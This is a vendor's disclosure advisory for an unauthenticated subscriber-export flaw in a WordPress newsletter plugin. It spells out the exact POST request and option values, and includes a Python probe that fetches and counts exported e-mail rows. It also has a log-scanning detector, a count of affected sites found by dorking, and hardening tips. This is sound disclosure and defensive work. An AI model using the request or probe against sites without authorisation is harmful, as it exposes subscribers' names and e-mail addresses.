A vulnerability that could have led to the theft of millions of e-mail addresses. During a routine audit of open source projects, we discovered an Improper Access Control vulnerability in Email Subscribers & Newsletters, a popular WordPress plugin active on more than 100,000 websites. The vulnerability allows an unauthenticated user to download the entire subscriber list of an affected website, including names and e-mail addresses. It has been patched in v3.4.8, so we would like to remind all plugin users to upgrade to a secure version as soon as possible.
Vulnerability exploitation method
- Sending an HTTP POST request to the website address with /?es=export appended, together with the extra POST data option=view_all_subscribers, returns a CSV file containing all subscriber data. No authentication is required.
- The file that performs the export is named export-email-address.php, and other options are available as well: view_active_subscribers, view_inactive_subscribers, registered_user and commentposed_user.
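The following script is an added example, not code from the original advisory or from the plugin: it reproduces the request described above against a site you are authorised to test, sends it without any cookies so that only the unauthenticated path is exercised, and then checks whether the response looks like a subscriber CSV rather than a normal page. The endpoint path and the option names come from the advisory; the e-mail heuristic, the HTML check and the sample response used for the offline demo are assumptions constructed here.

```python
#!/usr/bin/env python3
"""Check for the unauthenticated subscriber export (/?es=export).

Added example for this advisory; not the plugin's or the authors' code.
Only run it against sites you are authorised to test.
"""
import csv
import io
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

EXPORT_PATH = "/?es=export"
# Option values named in the advisory.
EXPORT_OPTIONS = (
    "view_all_subscribers",
    "view_active_subscribers",
    "view_inactive_subscribers",
    "registered_user",
    "commentposed_user",
)
# Loose e-mail pattern (assumption): good enough to recognise exported rows.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def build_export_request(base_url, option="view_all_subscribers"):
    """Return (url, body) for the POST request the advisory describes."""
    if option not in EXPORT_OPTIONS:
        raise ValueError("unknown export option: %s" % option)
    url = base_url.rstrip("/") + EXPORT_PATH
    body = urllib.parse.urlencode({"option": option}).encode()
    return url, body


def count_exported_addresses(body):
    """Parse a response body as CSV and count data rows carrying an e-mail
    address. Returns 0 for anything that is not a subscriber CSV, e.g. an
    HTML error page or an empty/refused export."""
    if "<html" in body[:2048].lower():
        return 0
    try:
        rows = list(csv.reader(io.StringIO(body)))
    except csv.Error:
        return 0
    if len(rows) < 2:          # header only, or nothing at all
        return 0
    hits = 0
    for row in rows[1:]:       # skip the header row
        if any(EMAIL_RE.match(cell.strip()) for cell in row):
            hits += 1
    return hits


def probe(base_url, timeout=10.0):
    """Send the export request with no session cookie and return the number
    of subscriber rows that came back (0 = refused or no subscriber data)."""
    url, body = build_export_request(base_url)
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"User-Agent": "es-export-check/1.0"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            text = resp.read(5_000_000).decode("utf-8", errors="replace")
    except urllib.error.HTTPError as e:
        text = e.read().decode("utf-8", errors="replace")
    except urllib.error.URLError:
        return 0
    return count_exported_addresses(text)


# Constructed sample response for the offline demo; column names are made up.
SAMPLE_CSV = (
    "Name,Email,Status\r\n"
    "Alice Example,alice@example.net,Confirmed\r\n"
    "Bob Example,bob@example.org,Unconfirmed\r\n"
    "not an address,,\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) == 2:
        n = probe(sys.argv[1])
        print("VULNERABLE: %d subscriber rows exported" % n if n
              else "export refused or returned no subscriber data")
    else:
        print("offline demo: %d addresses in sample CSV"
              % count_exported_addresses(SAMPLE_CSV))
```

Run it as `python3 es_export_check.py https://your-site.example` (file name is illustrative). A non-zero count means the export is reachable without logging in; a zero result should still be confirmed by hand, since a site may redirect, rate-limit or serve a custom page that the heuristic does not recognise.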
We were able to find 81,756 websites that use this software just by using Google dorking and several other publicly available techniques. It is reasonable to assume that an attacker who writes a bot to automate subscriber data collection could harvest millions of e-mail addresses in total.
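Site owners who ran a vulnerable version may want to know whether the export was actually pulled. The request target /?es=export shows up in ordinary web server access logs even though the POST body does not, so the following added example (not part of the original advisory) scans Apache/nginx combined-format log lines for requests to that endpoint and summarises, per source address, the POST requests that were answered with 200 and a non-empty body, which is what a successful export would look like. The log lines are constructed for the demo; the status and size thresholds are assumptions.

```python
#!/usr/bin/env python3
"""Find requests to the /?es=export endpoint in combined-format access logs.

Added example for this advisory, not code from the original page.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def is_export_target(target):
    """True when the request target carries es=export in its query string,
    regardless of the path (/, /index.php, ...) or extra parameters."""
    query = parse_qs(urlsplit(target).query)
    return "export" in query.get("es", [])


def find_export_attempts(lines):
    """Return one dict per log line that hits the export endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_export_target(m["target"]):
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "status": int(m["status"]), "bytes": size,
        })
    return hits


def summarise_by_source(hits):
    """Count, per source IP, the requests that look like a successful export:
    POST (as in the advisory), HTTP 200, and a response body was sent."""
    counts = Counter(
        h["ip"] for h in hits
        if h["method"] == "POST" and h["status"] == 200 and h["bytes"] > 0
    )
    return dict(counts)


# Constructed sample log lines (addresses from RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2018:12:00:01 +0000] "POST /?es=export HTTP/1.1" 200 48213 "-" "python-requests/2.18.4"',
    '198.51.100.7 - - [10/Jan/2018:12:03:44 +0000] "GET /?es=export HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Jan/2018:09:15:12 +0000] "POST /?es=export HTTP/1.1" 403 199 "-" "python-requests/2.18.4"',
    '192.0.2.10 - - [11/Jan/2018:09:16:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2764 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jan/2018:10:02:30 +0000] "POST /index.php?es=export&foo=1 HTTP/1.1" 200 51200 "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]) if len(sys.argv) == 2 else SAMPLE_LOG
    hits = find_export_attempts(lines)
    for h in hits:
        print("%(ts)s %(ip)s %(method)s -> %(status)s (%(bytes)d bytes)" % h)
    print("likely successful exports per source:", summarise_by_source(hits))
```

Point it at a real access log with `python3 es_export_log_check.py /var/log/apache2/access.log` (file name illustrative). A large response size on a 200 is the strongest indicator, since the CSV grows with the subscriber list; 403 or redirect responses after upgrading to v3.4.8 are expected and harmless.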
Some tips on how to improve the security of your WordPress site.
- Keep WordPress core and all plugins up-to-date.
- Use only the plugins you really need. The fewer you use, the smaller the attack surface.
- Do not keep inactive plugins.
- Use strong passwords and two-factor authentication; a CAPTCHA on login forms also helps against brute-force attempts.
- Apply the principle of least privilege to user accounts and roles.
- Implement basic hardening according to the WordPress Codex.
- Make sure your hosting server is up to date and secured.
- Avoid plain FTP (use SFTP or FTPS instead) and don't store passwords in plain text.
- Make sure you’re not using any vulnerable software on your website. You can check it on our free database of WordPress vulnerabilities, or you can simply install our WordPress security plugin that will check the status of your software and several other security parameters for you automatically.
By the way, we have some interesting data: you can check our statistics on WordPress vulnerabilities for 2017 here.